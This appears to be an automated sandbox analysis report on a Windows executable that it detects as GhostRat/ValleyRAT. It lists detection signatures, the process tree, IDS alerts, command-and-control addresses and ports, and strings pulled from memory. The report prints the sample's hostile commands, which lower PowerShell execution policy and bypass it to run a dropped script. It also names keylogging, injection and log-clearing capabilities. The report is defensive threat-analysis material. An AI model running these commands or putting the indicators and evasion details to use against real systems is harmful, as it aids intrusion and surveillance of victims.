Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Uulw5M1DfU.exe

Overview

General Information

Sample name:Uulw5M1DfU.exe
renamed because original name is a hash value
Original sample name:F889FE126788FFBAFC2E0CD5E233FEE9.exe
Analysis ID:1584172
MD5:f889fe126788ffbafc2e0cd5e233fee9
SHA1:30e1effa7018af4275713a9bb4e653455d31f93f
SHA256:0dbb48aad54c1f2361dbc58d9f22748df9156d8709554ad20f843811657c26d4
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Uulw5M1DfU.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\Uulw5M1DfU.exe" MD5: F889FE126788FFBAFC2E0CD5E233FEE9)
    • cmd.exe (PID: 2140 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Update.exe (PID: 4348 cmdline: C:\Users\Public\Bilite\Axialis\Update.exe MD5: FB325C945A08D06FE91681179BDCCC66)
        • cmd.exe (PID: 1148 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 6272 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2212 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1272 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 1072 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3756 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5688 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6972 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2160 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2936 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6512 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6524 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6516 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 932 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1836 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4548 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4076 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"C2 url": ["137.220.229.61:9091", "137.220.229.61:9092"]}
SourceRuleDescriptionAuthorStrings
00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            3.3.Update.exe.482260b.14.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              3.3.Update.exe.482260b.14.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                3.3.Update.exe.482260b.5.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  3.3.Update.exe.482260b.12.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    3.2.Update.exe.36705bf.6.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 31 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\Update.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\Update.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\Update.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ProcessId: 4348, ProcessName: Update.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Users\Public\Bilite\Axialis\Update.exe, ParentProcessId: 4348, ParentProcessName: Update.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 932, ProcessName: cmd.exe
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 137.220.229.61, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\Update.exe, Initiated: true, ProcessId: 4348, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 53790
                      Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1836, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 1836, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-04T14:48:52.519499+010020528751A Network Trojan was detected192.168.2.453816137.220.229.619091TCP
                      2025-01-04T14:50:00.195548+010020528751A Network Trojan was detected192.168.2.453836137.220.229.619091TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Update.exe.4348.3.memstrminMalware Configuration Extractor: GhostRat {"C2 url": ["137.220.229.61:9091", "137.220.229.61:9092"]}
                      Source: C:\Users\Public\Bilite\Axialis\Update.dllReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 60%
                      Source: Uulw5M1DfU.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA86EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6CA86EB0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA86720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6CA86720
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA86520 CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6CA86520
                      Source: Uulw5M1DfU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_qF source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2573546092.0000000008838000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2569455874.000000000776B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000000.1746874301.00000000006E2000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr
                      Source: Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdbo source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: z:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: x:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: v:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: t:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: r:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: p:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: n:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: l:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: j:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: h:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: f:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: b:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: y:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: w:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: u:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: s:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: q:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: o:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: m:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: k:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: i:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: g:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAAF888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6CAAF888
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAAF7D7 FindFirstFileExW,3_2_6CAAF7D7
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_037F80F0

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53816 -> 137.220.229.61:9091
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:53836 -> 137.220.229.61:9091
                      Source: Malware configuration extractorURLs: 137.220.229.61:9091
                      Source: Malware configuration extractorURLs: 137.220.229.61:9092
                      Source: global trafficTCP traffic: 137.220.229.61 ports 18852,1,2,5,9091,8
                      Source: global trafficTCP traffic: 192.168.2.4:53790 -> 137.220.229.61:18852
                      Source: global trafficTCP traffic: 192.168.2.4:53672 -> 1.1.1.1:53
                      Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: unknownTCP traffic detected without corresponding DNS query: 137.220.229.61
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F3360 recv,timeGetTime,_memmove,3_2_037F3360
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 00000011.00000002.2561978366.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: powershell.exe, 00000011.00000002.2573835228.0000000007100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microk
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
